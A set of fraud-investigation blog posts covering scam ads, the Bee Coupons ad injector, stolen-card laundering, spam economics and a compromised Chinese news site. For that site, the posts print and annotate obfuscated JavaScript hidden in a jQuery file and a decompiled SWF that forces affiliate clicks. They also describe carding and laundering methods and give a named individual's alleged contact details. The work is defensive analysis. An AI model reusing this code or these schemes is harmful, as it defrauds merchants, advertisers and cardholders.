5. The scammers themselves. From the Google ad landing pages, we know of three domains that they are using: rrlogg.in, rrlgn.in and rrhelp.in. Whois pages for these (here, here and here) list Dayanad Colony as the registrant using the number +91.9818290300 and email address karangosain2007@gmail.com

So what now?

Why are unscrupulous advertisers of this ilk allowed to run rampant? How is it that they can get away with something like this over and over again? Why aren’t the players responsible for playing a part in all of this (knowingly or unknowingly) made accountable here?

There’s no shortage of articles on bad guys like this [1,2,3,4] and from the merchant account above it’s obvious that these guys are profitable, so what gives?

The bottom line is that it’s the innocent consumers that are being nailed over and over again. Hard legal action coming in on the tail end of these scams is just not going to solve anything. In my mind I see the need for a very big and very angry gorilla stepping into the arena of online advertising sometime soon, and its name is regulation.

Updates

* 5/29/2014 – download links to the audio added *

* 6/3/2014 – scammer is still running strong through AdWords (Advertiser URL), now using the domain rrloginin.in and the number 1-855-808-1175 *

Search for “download skype”, “download google chrome”, “download firefox” or a myriad of other popular applications and you may find yourself unlucky enough to run into an ad injector.

Now an ad injector won’t present itself as an ad injector. Typically, it will bundle itself into an installer which will opt the user into installing a handful of programs onto her machine in addition to what she was originally looking for.

Sure, technical elites out there have no problem picking up on the subtle clues from an installer that an ad injector lies in waiting  (maybe they read the entire license agreement sometimes pointed to at the bottom of the screen), but less tech savvy folks think they are only getting what they were searching for. Nothing less, and arguably most important: nothing more.

Obviously, that’s not the case in today’s example, as we discuss an ad injector making the rounds and going by the name of Bee Coupons.

In the images below, with Bee Coupons installed courtesy of an installer on what was originally an uncompromised machine, I searched for “click fraud” on google.com. Google comes back with its responsive UI and I see exactly what I was expecting less than a second after pushing enter:

ad injectors and affiliate fraud may be good for business, but whose?

Unfortunately, whilst Google was fetching its response to the “click fraud” query, the Bee Coupons software was getting a result of its own. A few seconds pass and Bee Coupons decides to “enhance” Google’s search result with its own addition:

clickety clicky, kechang!

Of course the “enhanced results” aren’t really enhanced results at all, they’re ads. Upon clicking on those ads an advertiser will be charged a fee. The advertisers involved in this particular transaction are zoosk.com and ask.com. They may or may not be willing participants in this, for the online advertising ecosystem is fraught with so many complexities and third parties, that unless you sit and dissect a packet trace from start to finish every single time, it’s difficult to conclusively say who is who. Nonetheless, the odds are that Zoosk and Ask will be charged a fee upon a click.

But then where does the money go?

Good question. Ordinarily the money would go to Google. You see, that’s how they fund the largest search engine on the planet: with ads from their own advertising network. More often than not they have a direct relationship with the advertiser. When Google is both the publisher of an ad and the advertising network, they collect 100% of the fee. There are instances where Google is not the publisher of the ad but facilitates delivery of the ad through their ad network, in which case Google still collects a fee from the advertiser, a portion of which is then given to the publisher.

I’m confused, how does Google make money here?

Google does not make money here, for whilst they are the publisher in this example they will not be paid upon someone clicking on the Zoosk or Ask ads. This is because those are ads that were not put there by Google. The ads belong to an entirely different advertising network that has hijacked the Google Search Result Page and inserted their own means of generating revenue.

Now the first rebuttal offered from an ad injector is that they received the permission of the user operating the computer in question to do this. Whilst this statement may be true (assuming the operator was not a child — popular target of installers), it’s inconsequential for they did not receive permission from the entity that mattered: the real publisher of the content, i.e., Google.

So to be clear, again, the ads that have been injected into Google’s site do not belong to Google.

So who do they belong to?

I clicked on the little “i” next to “Ads by Bee Coupons” and was directed to a page on advertising-support.com that offered to explain why I was seeing the ads in question:

You may be seeing ads as part of our advertising solution for Internet properties (such as websites or web browser extensions). This solution provides content at no cost to you and displays advertisements during your web browsing experience. It was installed by you, or someone using your computer.

“at no cost to you” is highlighted because this statement cannot always be true. If you are the publisher of content on the Web (say Google, for example) and Bee Coupons comes along and pushes your top advertisers down (who bid good money to be there) in order to make room for Bee Coupon’s advertisers, then there may indeed be a cost to you. The user that clicked on Bee Coupon’s ads did not click on your ads, which is ultimately money that should have been sent your way. Not earning when you could have is most definitely a cost and if you were Google in our example above then you shall bear the brunt of it.

What’s more interesting here is that the “advertising solution” installed on the machine (Bee Coupons in my case) is not available for download from advertising-support.com. In fact, I could not find any advertising solution software at all, and that’s where the installers come in.

Advertising-support.com

It’s worth spending a few more moments looking at advertising-support.com:

Revenue Skyrockets with Solutions from Advertising Support!

Solutions that are divided up into two categories: advertisers and publishers.

bee_coupons_click_fraud_3

For advertisers:

advertising-support’s claims, with iPensatori’s comments:

  • Competitive Rates: This is the very reason why ad injectors exist at all; they offer competitive pricing. Instead of playing ball with the rest of the industry on advertising networks that have established prices and permission to place their ads on a publisher’s site, advertisers enjoy better placements on premium publisher properties at lower rates with ad injectors
  • Traffic in all countries: Welcome to the Internet
  • High quality traffic: It most certainly is. This is why advertisers pay the big bucks to be in the #1 spot on Google

For publishers:

advertising-support’s claims, with iPensatori’s comments:

  • Very easy to implement: One can’t help but wonder which publishers they are talking about here. It’s certainly not the publisher of the content (Google in our example), although if they were then it is pretty easy to implement: Google did nothing.
  • Non-Intrusive to users: No comment
  • Maximized Earnings: ?

Other Publishers Receiving Enhanced Ads

Google is not the only target of Bee Coupons. In order to satisfy the claims made above they have to inject ads into a number of top quality publishers. I captured a few samples below.

Twitter

bee_coupons_click_fraud_6

Msn

bee_coupons_click_fraud_5

Youtube

bee_coupons_click_fraud_7

WordPress

bee_coupons_click_fraud_8

Yahoo

bee_coupons_click_fraud_9

 Enter the Affiliate

Affiliates are masters of marketing, which makes sense and in a way justifies the whole industry. A small company that is really good at putting together trips to the Amazon jungle may not know the ins and outs of online marketing, or even care to learn them, since their specialty is trips to the Amazon jungle; why concentrate on anything other than improving that service? As a result it is well within their interest to offload the marketing portion of their business onto affiliates in return for cutting them in on a slice of the pie when there is a sale. How wonderful!

Wonderful, that is, until a rogue affiliate enters the picture.

bee_coupons_click_fraud_4

This packet trace steps us through the chain of events that happened behind the scenes upon clicking on the first Amazon advertiser provided by Bee Coupons:

  • Our adventure begins with s.txtsrving.info: a GET request with no referrer header (the entity responsible for the traffic, usually the publisher) returns Javascript that creates an element in the DOM and clicks on it. There are many reasons for doing this, one of which is to pick up a brand new referrer
  • Automated click from the JS above results in a GET request to 123srv.com with the referrer header now set to s.txtsrving.info. Response here includes JS which will redirect the browser to another script on 123srv.com
  • Response from 123srv.com redirects to advjmp.com which uses JS to redirect to Amazon via an Amazon affiliate link

The net effect is that one of Amazon’s affiliates (affiliate id advertiseco0e-20) basically outbid Amazon (with probably less money, thanks to the injector) for the top spot on Google when searching for Amazon. If the user searching for Amazon clicks on this ad and then buys something from Amazon within a certain period of time (say 24 hours), then the affiliate responsible for purchasing the ad from the injector will be paid a commission.
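
For the curious, here is a minimal sketch of how one might spot this sort of traffic in a HAR capture exported from a browser’s developer tools: flag any request whose URL carries Amazon’s associate tag parameter and note the referrer it arrived with. The capture file name is a placeholder; the HAR layout follows the standard HAR 1.2 format.

```python
# Minimal sketch: list requests in a HAR capture that carry an Amazon
# associate tag ("tag=") and show the referrer each arrived with.
import json

def affiliate_hits(har_path, marker="tag="):
    with open(har_path) as f:
        har = json.load(f)
    hits = []
    for entry in har["log"]["entries"]:
        url = entry["request"]["url"]
        if marker in url:
            referrer = next((h["value"] for h in entry["request"]["headers"]
                             if h["name"].lower() == "referer"), "(none)")
            hits.append((referrer, url))
    return hits

# "bee_coupons_capture.har" is a placeholder for your own capture.
for referrer, url in affiliate_hits("bee_coupons_capture.har"):
    print(f"{referrer} -> {url}")
```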

Amazon may allow this behavior, but it seems unlikely that they do. Some simple reasons why not:

  1. Ultimately Amazon will be paying a commission on traffic that they would have received anyway, for not only were they the first ad displayed before the injector arrived, but they were the first organic link displayed as well
  2. This practice is awfully unfair to the honest Amazon affiliates out there that don’t know about ad injectors, since their cookies will be overwritten by the affiliate using the ad injector.

I’ve spent the last few years presenting at a number of affiliate conferences, meeting and shaking hands with affiliates in person, people who make affiliate marketing their primary means of making ends meet. They don’t know how to broker relationships with questionable traffic sources. They’re not programmers. They have never heard of practices the likes of referrer laundering, blackhat marketing, cookie-stuffing or pay per view marketing and they most certainly don’t know the ins and outs of ad injectors.

So if you’re an honest Amazon affiliate competing for the same traffic that this ad injector is sending to Amazon affiliate advertiseco0e-20, know this: you don’t stand a chance.

Fraudster on the Roof

This post is the second entry in the “Fraudster on the Roof” series. Please remember that the intention of this series is for readers to learn how to better detect fraud, not to improve how they implement it.

Today we look at what it takes to launder money online, specifically through stolen credit cards.

Cards

I spend a lot of time thinking about the underground economy. What’s always fascinating to me is that the Web seems to provide a false sense of security to scammers, who think nothing of flaunting their illegal services in full view of authorities and anyone who really cares to take a look.

Pastebin.com is a surprising resource here. Point your browser to your favorite search engine and type in the following query:

“cvv site:pastebin.com”

The thousands of results returned include scammers that are selling everything from card data to bank logins, botnets, paypal accounts and complete online identities.

On stolen credit cards, the price per market and card type averages out to the following:

  • United States, American Express: $7.00
  • United States, Discover: $8.00
  • United States, Visa & Mastercard: $4.50
  • Europe, American Express: $12.50
  • Europe, Discover: $18.00
  • Europe, Visa & Mastercard: $14.50
  • Asia, American Express: $18.00
  • Asia, Discover: $18.00
  • Asia, Visa & Mastercard: $15.00

From my own reading here, it looks like prices double on average when the card is sold with information on the person that the card belonged to (address, name et cetera).

As I scroll through the services listed on Pastebin, I think about what buyers do with this data and how they really make any serious money. All too often does one hear about ‘data breach here’ and ‘millions of accounts compromised there’ but how does this equate to scammers making money? I’m not talking about scammers that sell the data card by card, I am referring to the scammers that buy it.

Perhaps the simple answer is that with a stolen credit card one could go buy a whole bunch of items from an online market and then resell them. But where would one deliver the goods from the initial purchase to? An entry level scammer may interrupt now and say that you don’t deliver them to yourself, because the goal is to launder the card as quickly as you can and make a clean getaway. One way to do this is to sell items at a discount on online market A; once these sell, you buy the product through online market B with the stolen card and ship it to the buyer from market A. Easy.

It’s a simple scam, but scammers are lazy and this sounds like too much work, mostly in the sense that it takes so long to make it all happen. Money would only slowly trickle in, and by the time it starts generating any meaningful income the account on A could get closed at any time (the buyer reports the seller after the cops come knocking).

Higher earnings can be found by mixing the offline and online world, where scammers take more risk by doing things in person but stand to make greater profit over fewer transactions. To make things happen in the offline world, scammers push the stolen card data they bought online onto a physical card that can be swiped offline.

Admittedly I am not an expert in offline credit card fraud (detection), but from what I have read it’s surprisingly easier to get up to speed here than I thought it would be. A few searches on eBay for the model number of a card writer (“MSR605”) yield a list of auctions with card writers that are ready to roll for less than $150.

ebay-writer-0 ebay-writer-1 ebay-writer-2

Note that the software provided with the writer facilitates pushing track 1/2/3 data onto an offline card. Track 1/2/3 is the credit card data for sale on the underground economy — it is stored on the magnetic stripe of your card.

credit card track 2 data

A scammer that is printing his/her own cards can then purchase fairly expensive and hard to track items from offline stores (jewelry), which can then be sold at a discounted rate online. Since the scammer paid nothing for the items that have been purchased, his profit is a function of the resources allocated to buying from offline stores and the effort required to sell online. The disconnect between offline and online, and making sure only to purchase hard to track items, mitigates the risk of the scammer’s online sales account being reported and his efforts going to waste.

As mentioned earlier, there’s a fair amount more risk involved with this scam, in the sense of getting caught and going to jail. Obviously moving the scam offline means that the scammer has to participate in the physical world, which is bound by the same laws as the people that he/she is stealing from. A savvy jewelry clerk could smell a bad deal and call the cops whilst putting on a ruse for the scammer. A card could have been reported as stolen between purchasing the data and printing it to a card, prompting a call to the credit card company when swiping the card.

“keep him busy, cops are on the way”

There’s just too much risk here.

Any competent scammer looking to make real money wouldn’t like this scam, so would either contract this work out (less risk, less reward) or stay away from it completely.

So where to next?

Hustle and Flow

Let’s take a moment to appreciate the relationship of each of the players involved in the scam that we have discussed thus far:

scammer hustle and flow

  • Scammer – deals with the Market and the Merchant. Has a stolen credit card and intends to use it to steal as much cash as possible (and still make a clean getaway)
  • Market – scammer will foster a relationship with the market in order to sell goods to a buyer
  • Merchant – sells goods/services to consumers. The scammer will buy goods using a stolen credit card and sell them at a discounted price to a buyer through the market. The merchant can also be the market
  • Buyer – the party on the other side of the transaction facilitated by the market

If there ever was a conference where all the fraudsters sat down and discussed their strategies, then at one time or another perhaps a more strategic fraudster would present his thoughts on the weakest links in the ecosystem.

“Fellow fraudsters, blackhatters and scammers, as many of you are surely aware, we’re being hit left and right with anti-abuse and fraud detection efforts. We’re no longer in the good ol’ wild west days of the 90s, and so as much as we have to cover our tracks more than ever before, we must also improvise our methods. Make no mistake about it: knowledge and creativity will be our strongest assets if we want to be successful in the future.”

He’d then present something similar to the following:

scammer hustle and flow 2

Now it’s not obvious to think like this. What’s important to remember is that all the fraudster is doing here is eliminating bottlenecks and potential risks in order to optimize his path to profit. So ultimately what the fraudster is saying is: why waste time with merchants and legitimate buyers when the enterprising fraudster can be both?

The Scam

It’s really simple, deceptively so, but the scam is for the fraudster to be both the buyer and the seller and not have to depend on a merchant for a supply of goods and/or services. By selling to himself at a price that he thinks is about right, he launders the stolen credit card through the market in a manner that is quick and almost risk free.

“That’s good in theory, but where would you apply this idea?”

When you think about a fraudster being both the buyer and the seller, then certain scenarios that used to be quite puzzling suddenly become rather clear.

App Stores

These markets make for prime targets. Just think about it a little: fraudsters can sell something that costs next to nothing to build (basically it’s just the cost of cycles on their CPU to build an empty app), and the market will happily onboard yet another publisher into its ever-increasing app store (now with millions of apps!).

Since the app store takes care of processing the buying and selling of the apps, it’s up to the fraudster only to make sure that each purchase he makes from himself with a stolen card (as many as possible whilst being careful not to raise any alarms) looks legitimate. The app store market will take care of the rest, and voila: credit card(s) laundered.

With this in mind, maybe now you’ll have an answer to the following question next time you are browsing around a very large app store:

“Why on earth would anyone actually pay money for this app? It just doesn’t do anything.”

Qbnews.cn ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading up qbnews.cn is going to result in a request to www.52zhishi.com/v.swf, which is then responsible for requesting www.52zhishi.com/v.asp. The ASP file returns a list of URLs (affiliate clicks included); the Flash payload in the browser then invisibly requests each of the links, and the cookies returned in these lookups result in forced/faked affiliate clicks.

The question now is where the initial request to 52zhishi.com comes from, i.e., what exactly is responsible for it? If you do a search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you do a dynamic search (via the DOM) you’re still not going to find it. Like many of the technical marvels among blackhats in this space, though, babyface was not the brightest bulb on the ever-shrinking Christmas tree specially reserved for them: he was totally predictable.

Take a look at http://www.qbnews.cn/statics/js/jquery.min.js and you’ll find what looks to be a jQuery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires...

In compromising this site, he has hidden his activities in this jQuery library. I've broken this down with the addition of my own comments (that's everything after //):

// so what we have here is code that will run every single time 
// qbnews.cn loads on a javascript enabled browser
(function()
{
  // Babyface is checking to see if a certain cookie has been set. 
  // If it has not then the following code will be executed. 
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks 
  // by making it a sequence of characters, when you evaluate these 
  // characters the name of the cookie comes out to "babyface" 
  if(document.cookie.indexOf(
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1)
  {
    try
    {
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      expires.setTime(expires.getTime()+24*60*60*1000);
      var c=document;
      c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101) 
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick 
      // off the attack. The payload is delivered from character 
      // sequence below which equals "http://www.52zhishi.com/v.swf"
      var p=String.fromCharCode(
        104,116,116,112,58,47,47,119,119, 
        119,46,53,50,122,104,105,115,104,
        105,46,99,111,109,47,118,46,115,119,102) 
        + "?i=" + (new Date()).valueOf();
      s.innerHTML=
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';
        (function()
        {
          if(!c.body)
          {
            setTimeout(arguments.callee,1000)
          }
          else
          {
            c.body.insertBefore(s,c.body.lastChild)
          }
        })()
    }
    catch(e)
    {
    }
  }
})();

So the JavaScript above answers our earlier question of what is responsible for the request to 52zhishi.com. The SWF that is loaded as a result of this JavaScript then calls an ASP file which has all of the links to which a visit will be forced. This SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.events.*;
    import flash.display.*;
    import flash.net.*;
    import flash.system.*; 
    public dynamic class MainTimeline extends MovieClip {
 
        public var loader:URLLoader;
        public var url:String;
        public var reqURL:URLRequest;
 
        public function MainTimeline(){
            addFrameScript(0, frame1);
        }
        function frame1(){
            Security.allowDomain("*");
            url = "http://www.52zhishi.com/v.asp";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        }
        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = NaN;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            loader = URLLoader(event.target);
            safe = new Number(loader.data["safe"]);
            url1 = new String(loader.data["url1"]);
            url2 = new String(loader.data["url2"]);
            url3 = new String(loader.data["url3"]);
            url4 = new String(loader.data["url4"]);
            url5 = new String(loader.data["url5"]);
            url6 = new String(loader.data["url6"]);
            url7 = new String(loader.data["url7"]);
            url8 = new String(loader.data["url8"]);
            url9 = new String(loader.data["url9"]);
            url10 = new String(loader.data["url10"]);
            url11 = new String(loader.data["url11"]);
            url12 = new String(loader.data["url12"]);
            url13 = new String(loader.data["url13"]);
            url14 = new String(loader.data["url14"]);
            url15 = new String(loader.data["url15"]);
            url16 = new String(loader.data["url16"]);
            url17 = new String(loader.data["url17"]);
            url18 = new String(loader.data["url18"]);
            url19 = new String(loader.data["url19"]);
            url20 = new String(loader.data["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                    sendToURL(request1);
                    sendToURL(request2);
                    sendToURL(request3);
                    sendToURL(request4);
                    sendToURL(request5);
                    sendToURL(request6);
                    sendToURL(request7);
                    sendToURL(request8);
                    sendToURL(request9);
                    sendToURL(request10);
                    sendToURL(request11);
                    sendToURL(request12);
                    sendToURL(request13);
                    sendToURL(request14);
                    sendToURL(request15);
                    sendToURL(request16);
                    sendToURL(request17);
                    sendToURL(request18);
                    sendToURL(request19);
                    sendToURL(request20);
                } catch(e:Error) {
                };
            };
        }
    }

}//package flashcs_old_fla

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated JavaScript
  • 1 point for trying to protect himself through JavaScript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF

Cost Per Lead (CPL) is an advertising model where the advertiser pays for sign-ups from interested consumers. Affiliates play the middlemen in these transactions: they send the interested consumers in the direction of the advertiser. So for each consumer that signs up with the advertiser, the affiliate in question is paid a commission or small fee. By offloading the task of sourcing consumers onto the affiliates, advertisers are spared the hassle of everything that this work involves. So it’s a great model, but unfortunately still open to abuse.

The following screenshot shows the MaxBounty program for the World of Tanks advertiser.

world of tanks affiliate fraud

Note the following:

  • Commission rate of “$2.65”/lead. This means that the advertiser will pay affiliates $2.65 for each sign-up that is sent their way
  • The advertiser is only interested in traffic from USA or Canada
  • Incentive traffic is prohibited, indicating that affiliates cannot encourage consumers to sign up with the advertiser by offering rewards such as cash or points in some program.

Now take a look at a screenshot from an online forum that pays subscribers to do small online tasks (much like Amazon’s Mechanical Turk):
world-of-tanks-2

Do You See What I See?

Most seasoned affiliate managers know where this is going, but don’t worry if you’re not sure where we’re heading yet because we are going to go through this step by step.

The online forum is offering $0.40 to users in the USA or Canada who will sign up using the link that has been provided. This is a packet trace of me following the link using my browser; the screenshot below shows the result.

world of tanks affiliate fraud

This is what’s going on in the packet trace (a short script for retracing the chain follows the list):

  1. A subscriber in the online forum decides he/she wants the $0.40 on offer
  2. He/she starts the task by navigating to http://tinyurl.com/olghhz7
  3. TinyURL redirects to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/?mn=1154 which then uses JavaScript and an HTML form to redirect the browser to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ (this essentially launders the referrer)
  4. http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ sets up a full-screen iframe containing www.mb57.com, which redirects to the following affiliate click URL: www.maxbounty.com/lnk.asp?o=5572&c=63867&a=105565&s1=tanks
  5. This URL redirects to track.popmog.com, which redirects to worldoftanks.com
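If you want to retrace a chain like this yourself without wading through a raw packet capture, a small script that follows the HTTP redirects and prints each hop gets you most of the way there. This is just a rough sketch in Python using the requests library; it won’t capture the JavaScript/form hop in step 3, which needs a real browser.

import requests

def trace_redirects(url):
    """Follow HTTP redirects and print every hop in the chain."""
    # A browser-like User-Agent, since some affiliate hops treat
    # obvious bots differently.
    headers = {"User-Agent": "Mozilla/5.0"}
    response = requests.get(url, headers=headers, allow_redirects=True, timeout=15)

    # response.history holds each intermediate redirect response.
    for hop in response.history:
        print(hop.status_code, hop.url)
    print(response.status_code, response.url, "(final)")

trace_redirects("http://tinyurl.com/olghhz7")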

So what you have here is an affiliate taking advantage of a price difference between two markets. Of course, one of these markets is of his own creation, but essentially this equates to arbitrage (pay $0.40, collect $2.65) and a bad deal for World of Tanks (the poor advertiser that bankrolls this operation).

YouTube Spam


Spend some time on YouTube and you may run into comments like:

Make money working from home, get paid $$$ to fill in surveys. Go here…

Needless to say, the comments bring no value to the context of the video that you may be watching. More often than not it is exactly the same comment over and over, i.e., it’s YouTube Spam.

In this post, we try to answer the following:

  • How big of a problem is this spam for YouTube?
  • How do the spammers monetize?
  • What tools & tricks are employed by the spammers?

Scope of the Problem

If we were on the backend of YouTube, we could take a naive approach to appreciating this problem:

“These are all our videos (N). Each video may be connected to a tainted set of comments; we consider a set of comments to be tainted when it contains spam. Having defined a function to determine whether a video’s comments are tainted, we count the videos with tainted comments (T) and get an idea of the scope of this problem by dividing T by N.”

Of course, this doesn’t take into account the rank of each spammy comment, but that’s why it’s called a naive approach.
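As a sketch, the calculation our hypothetical backend engineer is describing amounts to nothing more than the few lines below. The keyword-matching stand-in for a real spam classifier is my own simplification (the phrases are lifted from the sample comment quoted above); spotting the spam is, of course, the genuinely hard part.

# Crude stand-in for a real spam classifier: keyword matching.
SPAM_MARKERS = ("get paid", "fill in surveys", "working from home")

def is_tainted(comments):
    """True if this set of comments appears to contain spam."""
    return any(marker in comment.lower()
               for comment in comments
               for marker in SPAM_MARKERS)

def tainted_fraction(videos):
    """videos maps a video id to its list of comments; returns T divided by N."""
    if not videos:
        return 0.0
    tainted = sum(1 for comments in videos.values() if is_tainted(comments))
    return tainted / len(videos)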

Now we’re not on the backend of YouTube, but we are privy to the very front end of YouTube. In fact, we try to get a rough idea of how much of a problem this is by taking a look at only the default page presented when visiting youtube.com. This approach should work well for us because

  • it’s a whole lot smaller than N above, so it’s reproducible for the folks at home
  • it’s a page with massive traffic so will have massive attention from the spammers
  • it’s a page with massive traffic so will have massive attention from the YouTube abuse team

The following YouTube page was loaded at approximately 5pm on 8/5/2013:

youtube spam sample set

There are 40 videos presented on the front page. If you’re going to try this for yourself at home, then you need to click on each of the videos and scroll down into the comments. Fortunately (or not), you don’t have to scroll very far because the spammers have a knack for having their comments placed right at the top. What you’re looking for is something like this:

youtube spam comment

For this particular sample set, we were quite surprised to find that 9 of the 40 videos had tainted comments:

youtube spam

Now 22.5% of the front page videos having tainted comments may not sound like an awful lot, but when you consider that this is for the third most popular page on earth (Alexa Rank #3), then what’s going on here starts to take on a whole new perspective.

Monetization Path

So what’s really going on here?

At the very least, we know that spammers are targeting a significant percentage of the videos on YouTube’s front page. Of course, they’re not doing this for their health, so how do they make their money?

Consider the comment on the first highlighted video presented:

youtube_spam_comment_1

This is how i am making tons of money every single month working at my house..

Step 1: Follow the guide on this page: goo.gl\nb1Bak

Step 2: Get paid 5-20 bucks to answer each survey

Step 3: Retire and move overseas

This is a packet trace of the network activity on a machine when you browse goo.gl/nb1Bak in a browser:

  • goo.gl is Google’s URL Shortener.
  • goo.gl/nb1Bak redirects to 78.154.146.129/~leechtv/paidsurveys/?7 which redirects to trk.surveyjunkie.com/srd/klenzxcp
  • This then redirects to www.surveyjunkie.com

“So surveyjunkie.com is the spammer?”

No, surveyjunkie.com is not the spammer. Surveyjunkie is an advertiser in a Cost Per Lead (CPL) advertising model. They have an affiliate program which rewards affiliates when users sign up (leads). The spammer in this scenario is one of surveyjunkie’s affiliates (specifically ‘klenzxcp’), who is paid a finder’s fee when YouTube users sign up with surveyjunkie.com.

Now this may or may not violate surveyjunkie’s acceptable-use terms, although I could not find a policy detailing those terms. Of interest from the packet trace is that the Web request through to trk.surveyjunkie.com does not contain a Referer header, so surveyjunkie does not get to know where the traffic comes from. So they won’t know that it’s YouTube spam. One could argue that they choose not to know, but who is going to argue that?
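If an advertiser or network did want to know, a crude first pass is to look at the Referer header on incoming affiliate clicks and flag affiliates whose traffic almost always arrives with no referrer at all. Here is a rough sketch of that idea, assuming click logs are available as simple (affiliate_id, referer) pairs; missing referrers also happen for perfectly legitimate reasons, so treat this as a signal to investigate rather than proof of anything.

from collections import defaultdict

def flag_blind_affiliates(clicks, threshold=0.9, min_clicks=100):
    """clicks is an iterable of (affiliate_id, referer_or_None) pairs.
    Flags affiliates whose share of clicks with no Referer header
    meets or exceeds the threshold."""
    totals = defaultdict(int)
    missing = defaultdict(int)
    for affiliate_id, referer in clicks:
        totals[affiliate_id] += 1
        if not referer:
            missing[affiliate_id] += 1

    flagged = {}
    for affiliate_id, total in totals.items():
        ratio = missing[affiliate_id] / total
        if total >= min_clicks and ratio >= threshold:
            flagged[affiliate_id] = ratio
    return flagged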

“Okay but this is just a once off, you’ve only analyzed one comment”

Actually we analyzed all outbound links on all of the tainted comments. In this case all roads lead to surveyjunkie.com via two affiliates (klenzxcp and gqrzv5sx):

youtube spam leads to surveyjunkie

Modus Operandi

Obviously the spammers are capitalizing on a great source of traffic. You could argue that the traffic is free, but you would be wrong. The traffic is pretty cheap, but it’s not free. If you were going to pull this off yourself as a spammer new to the scene, then you’d need a couple of things:

  • A set of accounts to post the initial spam as a comment (A). Any spammer worth his salt will suggest using Phone Verified Accounts. You could set these up yourself or you could buy 10 for $5

youtube pva accounts

  • A set of accounts (B) to thumbs up the comments posted by set A. This is how the spammers get to the top of the comments section. For each comment posted by A, a group of approvers from B will come along and give it a thumbs up, which will quickly push it to the top. Naturally the size of B must be greater than the size of A. You can buy 100 regular (non-PVA) YouTube accounts for $5

buy youtube  accounts

  • The tricky part is writing a tool that will monitor the front page of YouTube and post comments (with approval from set B) on each of the videos that have not yet been targeted. Not too difficult if you have Compsci 101 behind you (or even just a few weeks fiddling with Python/Java/.Net…). You won’t have to write it yourself though, because there are plenty of bots that already do this for you (with captcha support!). Expect to spend anywhere from $50 to $150.

The costs above are not where it ends. If you refresh a video with tainted comments for a while, you will notice that the tainted comment does eventually disappear (feedback from the community marks it as bad). Of course, sit a little while longer and the tainted comment will return. So as much as the YouTube abuse team is fighting the spammers back, the spammers are constantly increasing the size of sets A and B.

“It’s all-out war out there! What’s an abuse team to do?”

This is not a trivial problem to solve. What surprised me the most from analyzing YouTube spam comments is that the same comment, after being taken down, will quickly make its way back to the top. I’d bet that there’s low-hanging fruit to be had here by combining user feedback on tainted comments with a unique hash of the comment itself. In doing so, one could block the comment at the front door.
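A minimal sketch of that idea, assuming nothing about YouTube’s actual backend: normalize the comment text, hash it, and refuse to accept anything whose hash the community has already voted down. The function names and normalization here are my own illustration.

import hashlib
import re

def comment_fingerprint(text):
    """Lowercase a comment, collapse its whitespace and hash it."""
    normalized = re.sub(r"\s+", " ", text.strip().lower())
    return hashlib.sha256(normalized.encode("utf-8")).hexdigest()

# Hashes of comments the community has already flagged as spam.
flagged_hashes = set()

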